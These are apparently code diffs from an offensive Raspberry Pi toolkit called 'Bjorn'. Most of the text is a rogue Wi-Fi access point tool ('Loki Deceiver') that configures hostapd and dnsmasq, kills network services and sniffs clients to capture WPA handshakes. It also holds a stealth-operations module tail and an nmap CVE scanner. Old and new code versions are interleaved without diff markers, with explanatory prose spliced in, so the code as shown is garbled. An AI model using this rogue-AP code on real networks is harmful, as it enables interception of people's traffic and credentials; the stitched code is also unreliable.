with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Stealth operations module")
parser.add_argument("-i", "--interface", help="Network interface to use")
parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
default='all', help="Operating mode")
parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
mode = args.mode or settings.get("mode")
base_delay = args.delay or settings.get("base_delay")
random_factor = args.randomize or settings.get("random_factor")
output_dir = args.output or settings.get("output_dir")
if not interface:
interface = conf.iface
logging.info(f"Using default interface: {interface}")
save_settings(interface, mode, base_delay, random_factor, output_dir)
guard = HeimdallGuard(
interface=interface,
mode=mode,
base_delay=base_delay,
random_factor=random_factor,
output_dir=output_dir
)
    try:
        if guard.start():
            logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
            while True:
                time.sleep(1)
    except KeyboardInterrupt:
        logging.info("Stopping Heimdall Guard...")
        guard.stop()
    return "success"
if __name__ == "__main__":
    main()
if __name__ == "__main__":
    from init_shared import shared_data
    guard = HeimdallGuard(shared_data)
    guard.execute("0.0.0.0", None, {}, "heimdall_guard")


@@ -1,467 +1,257 @@
# WiFi deception tool for creating malicious access points and capturing authentications.
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Wireless interface for AP creation (default: wlan0).
# -s, --ssid SSID for the fake access point (or target to clone).
# -c, --channel WiFi channel (default: 6).
# -p, --password Optional password for WPA2 AP.
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loki_deceiver.py -- WiFi deception tool for BJORN.
Creates rogue access points and captures authentications/handshakes.
Requires: hostapd, dnsmasq, airmon-ng.
"""
import os
import json
import argparse
from datetime import datetime
import logging
import subprocess
import signal
import time
import threading
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
import time
import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json")
b_args = {
"interface": {
"type": "text",
"label": "Wireless Interface",
"default": "wlan0"
},
"ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver:
def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR, **kwargs):  # tolerate extra options passed by main()
self.interface = interface
self.ssid = ssid
self.channel = channel
self.password = password
self.output_dir = output_dir
self.original_mac = None
self.captured_handshakes = []
self.captured_credentials = []
self.active = False
def __init__(self, shared_data):
self.shared_data = shared_data
self.hostapd_proc = None
self.dnsmasq_proc = None
self.tcpdump_proc = None
self._sniffer = None
self.active_clients = set()
self.stop_event = threading.Event()
self.lock = threading.Lock()
def setup_interface(self):
"""Configure wireless interface for AP mode."""
try:
# Kill potentially interfering processes
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Stop NetworkManager
subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Save original MAC
self.original_mac = self.get_interface_mac()
# Enable monitor mode
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info(f"Interface {self.interface} configured in monitor mode")
return True
except Exception as e:
logging.error(f"Failed to setup interface: {e}")
return False
def _setup_monitor_mode(self, iface: str):
logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
def get_interface_mac(self):
"""Get the MAC address of the wireless interface."""
try:
result = subprocess.run(['ip', 'link', 'show', self.interface],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if result.returncode == 0:
mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout)
if mac:
return mac.group(1)
except Exception as e:
logging.error(f"Failed to get interface MAC: {e}")
return None
def _create_configs(self, iface, ssid, channel, password):
# hostapd.conf
h_conf = [
f'interface={iface}',
'driver=nl80211',
f'ssid={ssid}',
'hw_mode=g',
f'channel={channel}',
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
def create_ap_config(self):
"""Create configuration for hostapd."""
try:
config = [
'interface=' + self.interface,
'driver=nl80211',
'ssid=' + self.ssid,
'hw_mode=g',
'channel=' + str(self.channel),
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if self.password:
config.extend([
'auth_algs=1',
'wpa=2',
'wpa_passphrase=' + self.password,
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
config_path = '/tmp/hostapd.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
return config_path
except Exception as e:
logging.error(f"Failed to create AP config: {e}")
return None
# dnsmasq.conf
d_conf = [
f'interface={iface}',
'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
d_path = '/tmp/bjorn_dnsmasq.conf'
with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
return h_path, d_path
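As a quick illustration, the open-AP (no password) branch of `_create_configs` joins its key/value list into a `hostapd.conf` body like this; the interface/SSID/channel values below are just the `b_args` defaults, not anything the script enforces:

```python
# Sketch of the open-AP hostapd.conf assembly from _create_configs.
iface, ssid, channel = "wlan0", "Bjorn_Free_WiFi", 6
h_conf = [
    f"interface={iface}",
    "driver=nl80211",
    f"ssid={ssid}",
    "hw_mode=g",
    f"channel={channel}",
    "macaddr_acl=0",
    "ignore_broadcast_ssid=0",
]
print("\n".join(h_conf))
```

With a password set, the WPA2 block (`wpa=2`, `wpa_passphrase=...`, CCMP pairwise) is appended to the same list before joining.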
def setup_dhcp(self):
"""Configure DHCP server using dnsmasq."""
try:
config = [
'interface=' + self.interface,
'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
config_path = '/tmp/dnsmasq.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
# Configure interface IP
subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return config_path
except Exception as e:
logging.error(f"Failed to setup DHCP: {e}")
return None
def start_ap(self):
"""Start the fake access point."""
try:
if not self.setup_interface():
return False
hostapd_config = self.create_ap_config()
dhcp_config = self.setup_dhcp()
if not hostapd_config or not dhcp_config:
return False
# Start hostapd
self.hostapd_process = subprocess.Popen(
['sudo', 'hostapd', hostapd_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start dnsmasq
self.dnsmasq_process = subprocess.Popen(
['sudo', 'dnsmasq', '-C', dhcp_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.active = True
logging.info(f"Access point {self.ssid} started on channel {self.channel}")
# Start packet capture
self.start_capture()
return True
except Exception as e:
logging.error(f"Failed to start AP: {e}")
return False
def start_capture(self):
"""Start capturing wireless traffic."""
try:
# Start tcpdump for capturing handshakes
handshake_path = os.path.join(self.output_dir, 'handshakes')
os.makedirs(handshake_path, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")
self.tcpdump_process = subprocess.Popen(
['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start sniffing in a separate thread
self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
self.sniffer_thread.start()
except Exception as e:
logging.error(f"Failed to start capture: {e}")
def packet_sniffer(self):
"""Sniff and process packets."""
try:
scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
stop_filter=lambda p: not self.active)
except Exception as e:
logging.error(f"Sniffer error: {e}")
def process_packet(self, packet):
"""Process captured packets."""
try:
if packet.haslayer(Dot11):
# Process authentication attempts
if packet.type == 0 and packet.subtype == 11: # Authentication
self.process_auth(packet)
# Process association requests
elif packet.type == 0 and packet.subtype == 0: # Association request
self.process_assoc(packet)
# Process EAPOL packets for handshakes
elif packet.haslayer(EAPOL):
self.process_handshake(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def process_auth(self, packet):
"""Process authentication packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'auth',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing auth packet: {e}")
def process_assoc(self, packet):
"""Process association packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'assoc',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing assoc packet: {e}")
def process_handshake(self, packet):
"""Process EAPOL packets for handshakes."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_handshakes.append({
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing handshake packet: {e}")
def save_results(self):
"""Save captured data to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'ap_info': {
'ssid': self.ssid,
'channel': self.channel,
'interface': self.interface
},
'credentials': self.captured_credentials,
'handshakes': self.captured_handshakes
}
output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def cleanup(self):
"""Clean up resources and restore interface."""
try:
self.active = False
# Stop processes
for process in [self.hostapd_process, self.dnsmasq_process, self.tcpdump_process]:
if process:
process.terminate()
process.wait()
# Restore interface
if self.original_mac:
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Restart NetworkManager
subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info("Cleanup completed")
except Exception as e:
logging.error(f"Error during cleanup: {e}")
def save_settings(interface, ssid, channel, password, output_dir, **extra):
"""Save settings to JSON file (extra keyword options are stored as-is)."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"ssid": ssid,
"channel": channel,
"password": password,
"output_dir": output_dir,
**extra
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
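The precedence rule in `main()` is: a CLI value wins, otherwise the saved JSON value is used. A minimal sketch with hypothetical values:

```python
# CLI value takes precedence; fall back to the saved settings file.
settings = {"interface": "wlan1", "ssid": "Cafe_WiFi"}  # as returned by load_settings()
cli_interface = None          # flag not passed on the command line
cli_ssid = "Evil_Twin"        # flag passed explicitly

interface = cli_interface or settings.get("interface")
ssid = cli_ssid or settings.get("ssid")
print(interface, ssid)  # wlan1 Evil_Twin
```

Note the caveat for flags with truthy argparse defaults (e.g. `--channel` defaulting to 6): `args.channel or settings.get("channel")` never falls through to the saved value, so only defaultless flags actually honor the settings file.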
def main():
parser = argparse.ArgumentParser(description="WiFi deception tool")
parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
parser.add_argument("-s", "--ssid", help="SSID for fake AP")
parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
parser.add_argument("-p", "--password", help="WPA2 password")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
# Honeypot options
parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")
# Advanced options
parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
ssid = args.ssid or settings.get("ssid")
channel = args.channel or settings.get("channel")
password = args.password or settings.get("password")
output_dir = args.output or settings.get("output_dir")
# Load advanced settings
captive_portal = args.captive_portal or settings.get("captive_portal", False)
clone_ap = args.clone_ap or settings.get("clone_ap")
karma = args.karma or settings.get("karma", False)
beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
max_clients = args.max_clients or settings.get("max_clients", 10)
timeout = args.timeout or settings.get("timeout")
if not interface:
logging.error("Interface is required. Use -i or save it in settings")
return
# Clone AP if requested
if clone_ap:
logging.info(f"Attempting to clone AP: {clone_ap}")
clone_info = scan_for_ap(interface, clone_ap)
if clone_info:
ssid = clone_info['ssid']
channel = clone_info['channel']
logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
else:
logging.error(f"Failed to find AP to clone: {clone_ap}")
def _packet_callback(self, packet):
if self.shared_data.orchestrator_should_exit:
return
# Save all settings
save_settings(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
clone_ap=clone_ap,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients,
timeout=timeout
)
# Create and configure deceiver
deceiver = LokiDeceiver(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients
)
try:
# Start the deception
if deceiver.start():
logging.info(f"Access point {ssid} started on channel {channel}")
if packet.haslayer(Dot11):
addr2 = packet.addr2 # Source MAC
if addr2 and addr2 not in self.active_clients:
# Association request or Auth
if packet.type == 0 and packet.subtype in [0, 11]:
with self.lock:
self.active_clients.add(addr2)
logger.success(f"LokiDeceiver: New client detected: {addr2}")
self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
if timeout:
logging.info(f"Running for {timeout} seconds")
time.sleep(timeout)
deceiver.stop()
else:
logging.info("Press Ctrl+C to stop")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Loki Deceiver...")
except Exception as e:
logging.error(f"Unexpected error: {e}")
finally:
deceiver.stop()
logging.info("Cleanup completed")
if EAPOL and packet.haslayer(EAPOL):
logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
password = getattr(self.shared_data, "loki_deceiver_password", "")
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
try:
self.stop_event.clear()
# self._setup_monitor_mode(iface) # Optional depending on driver
h_path, d_path = self._create_configs(iface, ssid, channel, password)
# Set IP for interface
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
# Start processes
# Use DEVNULL to avoid blocking on unread PIPE buffers.
self.hostapd_proc = subprocess.Popen(
['sudo', 'hostapd', h_path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
self.dnsmasq_proc = subprocess.Popen(
['sudo', 'dnsmasq', '-C', d_path, '-k'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Start sniffer (must be stoppable to avoid leaking daemon threads).
if HAS_SCAPY and scapy and AsyncSniffer:
try:
self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
self._sniffer.start()
except Exception as sn_e:
logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
self._sniffer = None
start_time = time.time()
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# Check if procs still alive
if self.hostapd_proc.poll() is not None:
logger.error("LokiDeceiver: hostapd crashed.")
break
# Progress report
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
time.sleep(2)
logger.info("LokiDeceiver: Stopping AP.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
except Exception as e:
logger.error(f"LokiDeceiver error: {e}")
return "failed"
finally:
self.stop_event.set()
if self._sniffer is not None:
try:
self._sniffer.stop()
except Exception:
pass
self._sniffer = None
# Cleanup
for p in [self.hostapd_proc, self.dnsmasq_proc]:
if p:
try: p.terminate(); p.wait(timeout=5)
except Exception: pass
# Restore NetworkManager if needed (custom logic based on usage)
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
return "success"
if __name__ == "__main__":
# Set process niceness to high priority
try:
os.nice(-10)
except Exception:
logging.warning("Failed to set process priority. Running with default priority.")
# Start main function
main()
from init_shared import shared_data
loki = LokiDeceiver(shared_data)
loki.execute("0.0.0.0", None, {}, "loki_deceiver")


@@ -2,13 +2,16 @@
Vulnerability Scanner Action
Ultra-fast CPE scan (+ CVE via vulners when available),
with an optional "heavy" fallback.
Displays % progress in Bjorn.
"""
import re
import time
import nmap
import json
import logging
from typing import Dict, List, Set, Any, Optional
from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData
from logger import Logger
@@ -22,41 +25,47 @@ b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
# Regex compiled once (saves CPU on the Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
class NmapVulnScanner:
"""Vulnerability scanner via nmap (fast CPE/CVE mode)."""
"""Vulnerability scanner via nmap (fast CPE/CVE mode) with progress reporting."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.nm = nmap.PortScanner()
# No shared self.nm: instantiate a scanner inside each scan method
# to avoid state corruption between batches.
logger.info("NmapVulnScanner initialized")
# ---------------------------- Public API ---------------------------- #
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
logger.info(f"🔍 Starting vulnerability scan for {ip}")
logger.info(f"Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
self.shared_data.bjorn_progress = "0%"
# 1) Metadata from the queue
if self.shared_data.orchestrator_should_exit:
return 'failed'
# 1) Metadata
meta = {}
try:
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# 2) retrieve MAC and ALL ports of the host
# 2) Retrieve MAC and ALL ports
mac = row.get("MAC Address") or row.get("mac_address") or ""
# Force retrieval of ALL ports from the DB
ports_str = ""
if mac:
r = self.shared_data.db.query(
@@ -64,8 +73,7 @@ class NmapVulnScanner:
)
if r and r[0].get('ports'):
ports_str = r[0]['ports']
# Fall back to metadata if needed
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
@@ -73,143 +81,240 @@ class NmapVulnScanner:
)
if not ports_str:
logger.warning(f"⚠️ No ports to scan for {ip}")
logger.warning(f"No ports to scan for {ip}")
self.shared_data.bjorn_progress = ""
return 'failed'
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
logger.debug(f"📋 Found {len(ports)} ports for {ip}: {ports[:5]}...")
# FIX: only filter if the config option is enabled AND the host was already scanned
# Clean up ports (keep just the number for the 80/tcp format)
ports = [p.split('/')[0] for p in ports]
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
# 3) "Rescan Only" filtering
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"🔄 Filtered {original_count - len(ports)} already-scanned ports")
logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
if not ports:
logger.info(f"No new/changed ports to scan for {ip}")
logger.info(f"No new/changed ports to scan for {ip}")
self.shared_data.bjorn_progress = "100%"
return 'success'
# Scan (fast mode by default)
logger.info(f"🚀 Starting nmap scan on {len(ports)} ports for {ip}")
# 4) SCAN WITH PROGRESS
if self.shared_data.orchestrator_should_exit:
return 'failed'
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
# Persistence (CVE/CPE split)
if self.shared_data.orchestrator_should_exit:
logger.info("Scan interrupted by user")
return 'failed'
# 5) In-memory deduplication before persisting
findings = self._deduplicate_findings(findings)
# 6) Persist
self.save_vulnerabilities(mac, ip, findings)
logger.success(f"✅ Vuln scan done on {ip}: {len(findings)} entries")
# Finalize UI
self.shared_data.bjorn_progress = "100%"
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
except Exception as e:
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
self.shared_data.bjorn_progress = "Error"
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
"""Check whether the host has already been scanned at least once."""
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
"""
Return the list of ports to scan, excluding those already scanned recently.
"""
if not ports:
return []
# Ports already covered by detected_software (is_active=1)
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
p = str(r['port'])
ls = r.get('last_seen')
seen[p] = ls
seen[str(r['port'])] = r.get('last_seen')
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
def fresh(port: str) -> bool:
ls = seen.get(port)
if not ls:
return False
try:
dt = datetime.fromisoformat(ls.replace('Z',''))
return dt >= cutoff
except Exception:
return True
return [p for p in ports if (p not in seen) or (not fresh(p))]
final_ports = []
for p in ports:
if p not in seen:
final_ports.append(p)
else:
try:
dt = datetime.fromisoformat(seen[p].replace('Z', ''))
if dt < cutoff:
final_ports.append(p)
except Exception:
pass
return final_ports
else:
# Without TTL: skip ports already scanned/active
return [p for p in ports if p not in seen]
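The TTL branch of the filter can be exercised in isolation. A sketch with made-up timestamps (the `seen` map mirrors what the `detected_software` query returns):

```python
from datetime import datetime, timedelta

ttl = 3600  # vuln_rescan_ttl_seconds
now = datetime.utcnow()
cutoff = now - timedelta(seconds=ttl)
seen = {
    "80": (now - timedelta(seconds=120)).isoformat(),   # scanned 2 min ago -> fresh
    "22": (now - timedelta(seconds=7200)).isoformat(),  # scanned 2 h ago  -> stale
}
ports = ["22", "80", "443"]  # 443 was never scanned

final_ports = []
for p in ports:
    if p not in seen:
        final_ports.append(p)            # never seen: always scan
    else:
        dt = datetime.fromisoformat(seen[p].replace("Z", ""))
        if dt < cutoff:
            final_ports.append(p)        # stale: rescan
print(final_ports)  # ['22', '443']
```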
# ---------------------------- Scanning ------------------------------ #
# ---------------------------- Helpers -------------------------------- #
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
"""Drop duplicates (same port + vuln_id) to avoid useless inserts."""
seen: set = set()
deduped = []
for f in findings:
key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
if key not in seen:
seen.add(key)
deduped.append(f)
return deduped
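Because the key is the (port, vuln_id) pair, the same CVE seen on two different ports is kept twice, while exact repeats collapse:

```python
# Same dedup loop as _deduplicate_findings, on sample findings.
findings = [
    {"port": 80, "vuln_id": "CVE-2021-41773"},
    {"port": 80, "vuln_id": "CVE-2021-41773"},   # exact repeat -> dropped
    {"port": 443, "vuln_id": "CVE-2021-41773"},  # same CVE, other port -> kept
]
seen, deduped = set(), []
for f in findings:
    key = (str(f.get("port", "")), str(f.get("vuln_id", "")))
    if key not in seen:
        seen.add(key)
        deduped.append(f)
print([f["port"] for f in deduped])  # [80, 443]
```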
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
return [x.strip() for x in cpe.splitlines() if x.strip()]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
return [str(cpe).strip()]
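python-nmap may hand back the `cpe` field as a newline-joined string, a list, or something else entirely; the normalization above flattens all three shapes. A standalone mirror of that helper:

```python
def extract_cpe_values(port_info):
    """Mirror of _extract_cpe_values: normalize str/list/other CPE shapes."""
    cpe = port_info.get("cpe")
    if not cpe:
        return []
    if isinstance(cpe, str):
        return [x.strip() for x in cpe.splitlines() if x.strip()]
    if isinstance(cpe, (list, tuple, set)):
        return [str(x).strip() for x in cpe if str(x).strip()]
    return [str(cpe).strip()]

print(extract_cpe_values({"cpe": "cpe:/a:openbsd:openssh:7.2\ncpe:/o:linux:linux_kernel"}))
print(extract_cpe_values({"cpe": ["cpe:/a:apache:http_server:2.4.41"]}))
print(extract_cpe_values({}))  # []
```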
def extract_cves(self, text: str) -> List[str]:
"""Extract CVEs via the pre-compiled regex (no recompilation per call)."""
if not text:
return []
return CVE_RE.findall(str(text))
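The pattern is case-insensitive and requires a 4-digit year plus a 4-to-7-digit sequence number, so near-misses don't match. A quick check against sample script output:

```python
import re

# Same pre-compiled pattern as the module-level CVE_RE above.
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)

sample = "OpenSSH 7.2p2: cve-2016-6210 (user enum), CVE-2016-10009; not-a-cve-123"
print(CVE_RE.findall(sample))  # ['cve-2016-6210', 'CVE-2016-10009']
```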
